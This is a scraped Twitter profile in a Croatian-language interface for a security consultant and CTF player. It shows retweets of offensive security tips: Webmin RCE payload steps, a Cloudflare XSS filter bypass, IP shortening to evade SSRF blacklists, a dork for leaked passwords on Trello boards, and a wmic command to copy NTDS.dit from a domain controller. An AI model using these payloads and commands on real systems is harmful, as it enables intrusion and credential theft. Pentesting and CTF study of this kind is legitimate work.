Baha Baghdadi

@BahaBaghdadi

CyberSec consultant CTF Player - aka (Noxious/bibiwars)

Tunisia
Vrijeme pridruživanja: lipanj 2012.
Rođen/a 01. veljače

Tweetovi

Blokirali ste korisnika/cu @BahaBaghdadi

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @BahaBaghdadi

  1. proslijedio/la je Tweet
    13. pro 2019.

    Hi, If you want to know how SSRF Vulnerability was exist in Vimeo, you should read: Reported through ;)

    Poništi
  2. proslijedio/la je Tweet
    10. pro 2019.
    Poništi
  3. proslijedio/la je Tweet
    8. pro 2019.
    Poništi
  4. proslijedio/la je Tweet
    5. lis 2019.
    Poništi
  5. proslijedio/la je Tweet
    6. ruj 2019.

    Today we released a community-developed exploit module PR for (CVE-2019-0708). We expect to continue refining the exploit over time in collaboration with contributors. Some important notes on exploitation and detection from :

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    30. kol 2019.

    CVE-2019-15642 another Webmin Remote Code Execution (authenticated) 1. set User-Agent as webmin 2. set Authorization 3. set payload: OBJECT CGI;print "Content-Type: chybeta\n\n";$cmd=`id`;print "$cmd"; 4. post to /rpc.cgi

    Poništi
  7. proslijedio/la je Tweet
    28. kol 2019.

    Tip: While you are trying to find passwords, secrets, APIkeys, etc. in your exercises, NEVER forget to check in the PUBLIC TRELLO BOARDS. For easy wins, use inurl: AND intext:password AND intext:database

    Poništi
  8. proslijedio/la je Tweet

    A maths meme that is actually funny rather than stupid: Solve carefully! 230 - 220 x 0.5 = You probably won’t believe it but the answer is 5!

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    10. srp 2019.

    Cloudflare Bypass Just use {alert`1`} instead of alert(1). Any vector will work (except <script>). Yeah, it's just that easy.

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    8. srp 2019.

    I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.

    Poništi
  11. 10. srp 2019.

    Does anyone have a referral code for Blitz? I’m so far in line! via

    Poništi
  12. proslijedio/la je Tweet
    9. srp 2019.

    ===Type juggling=== After SHA-224 announcing the first magic hash for SHA-256. Using distributed computing found a magic hash for SHA-256. For SHA-256(34250003024812) we have 0e46289032038065916139621039085883773413820991920706299695051332 ,

    Poništi
  13. proslijedio/la je Tweet
    7. srp 2019.

    Crazy blind SSRF exploitation technique using Windows Defender by

    Poništi
  14. proslijedio/la je Tweet
    21. lip 2019.

    Our new article. We cracked the IDA Pro password by predicting the PRNG!

    Poništi
  15. proslijedio/la je Tweet
    7. lip 2019.

    SandboxEscaper details new "ByeBear" zero-day impacting Windows 10 and Server 2019. It's another bypass for the CVE-2019-0841 patch. She previously published a first bypass 2 weeks ago.

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    21. svi 2019.

    My new favorite way to launch powershell.exe :: I think you'll like this one, 🥰

    Poništi
  17. proslijedio/la je Tweet
    9. svi 2019.
    Poništi
  18. proslijedio/la je Tweet
    2. svi 2019.

    REMOTELY EXTRACT NTDS.DIT & SYSTEM hive STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy: wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

    Prikaži ovu nit
    Poništi
  19. 1. svi 2019.

    fascinating ❤️ Well done Abdelkader Gueddana and the whole team 👏

    Poništi
  20. proslijedio/la je Tweet
    15. tra 2019.

    Bypassing Google Authentication on Web app + php imap_open Remote Code Execution ( Securinets Final 2019 Write up )

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·